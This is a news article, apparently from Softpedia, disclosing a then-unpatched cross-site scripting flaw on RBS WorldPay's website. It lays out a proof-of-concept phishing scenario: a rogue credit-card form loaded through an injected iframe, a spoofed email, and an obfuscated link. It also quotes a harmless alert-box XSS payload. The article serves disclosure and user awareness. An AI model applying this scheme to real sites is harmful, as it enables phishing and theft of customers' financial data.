14 DAY TRIAL // A cross-site scripting vulnerability discovered in the website of RBS WorldPay allows attackers to launch efficient phishing attacks against customers. The same flaw can also be exploited to serve malware or prompt rogue alerts.
The XSS weakness has been discovered and documented by a Team Elite member, going by the online handle of Methodman. The grey-hat hacker has previously disclosed similar vulnerabilities in numerous high-profile websites.
In this particular case, however, the threat is much more serious, because there is a real interest in RBS WorldPay, displayed by cybercrooks. We just recently reported that the company's costumers had been targeted by malware distributors via malicious spam e-mails.
In order to raise awareness, we decided to describe a proof-of-concept phishing attack that leveraged on this vulnerability to significantly increase its credibility and success rate. The scenario starts with some potential attackers creating a simple HTML form for inputting sensitive information such as credit card details, bank account number, name, address, Social Security number, etc.
This form can be then hosted on a third-party server under the control of the attackers and configured to save the submitted information into a database. Furthermore, styling and other details can be added to the form, in order to make it appear legit. This can include a full header with RBS WorldPay logo, as well as footer with company contact information and copyright notice.
The next step would be crafting a phishing e-mail with spoofed From field, so as to appear to originate from an @rbsworldpay.com address. The subject and message could reflect a plausible reason why customers would be required to fill in the rogue form. Up to this point, this would seem like any other e-mail phishing attack, but here is where the attackers can exploit the XSS weakness to get an edge.
The link to the form included in the e-mail could be pointed to an rbsworldpay.com malformed URL, which injects an IFrame into the website. The IFrame can load the externally hosted form and can be easily styled to blend into the page. You can check out our screenshot to see how we loaded Softpedia content into the RBS WorldPay website.
Suspicious users hovering the mouse pointer over the link in the e-mail will see an http://www. rbsworldpay.com URL, which will also be displayed in the address bar of the browser when opened. This would be a significant advantage for the phishers in terms of credibility.
However, the level of trickery that can be achieved does not stop here. To avoid users seeing the <iframe> part of the malformed URL in the e-mail client, it can be obfuscated through a JavaScript function. In his own PoC, Methodman prompts an alert reading "XSS" by using: <script>alert(String.fromCharCode(88,83,83))</script>
Granted, in this case, instead of seeing the <iframe> tag users will see a <script> tag; however, malicious IFrames, being a common occurrence in XSS attacks, have received much more media attention. Therefore, while less technical users could be alerted by the presence of IFrames, a script tag is unlikely to trigger the same response.
What users should learn from this example is that even if the URL present in an e-mail asking for their personal and financial details points to a legit domain name that they known and trust, they should take additional steps to confirm its legitimacy. Calling the company over the phone and asking them about it is always a good idea. When this is not possible, the official contact e-mail addresses listed on its website can be used to submit such a query.
RBS WordPay is an Atlanta-based company operated by The Royal Bank of Scotland Group. It offers payment processing solutions that cover credit, debit, Electronic Bank Transfers, gift cards, customer loyalty cards, checks, ATM, and tailored solutions for retail, restaurant, petroleum, convenience stores, grocery, hospitality, transport, and cardholders not present in these sectors.
The company has seen its share of security-related incidents in the past. Back in December 2008, the RBS WorldPay announced that unknown hackers had penetrated its computer infrastructure, installed malware onto the system and intercepted financial data passing through the network. It was later revealed that 100 re-loadable payroll cards compromised during the breach had been used to instrument one of the largest and most complex credit card fraud operations in history, which earned the cybercrooks an estimated $9 million.
As a result of the incident Visa later removed RBS WorldPay from its list of providers compatible with the Payment Card Industry's Data Security Standard (PCI DSS). Despite this fact, the company went on to win an IRS government contract to process tax-return payments starting with 2010. On May 11, 2009, RBS WorldPay was re-certified as being in compliance with PCI DSS, after an audit performed by Verizon Business/Cybertrust.
Note: At the time of writing this article, the vulnerability described above was still active. As a result, we have contacted RBS WorldPay as well as its parent company, The Royal Bank of Scotland Group, using three different e-mail addresses that we were able to locate and we will return with more information as/if it becomes available.
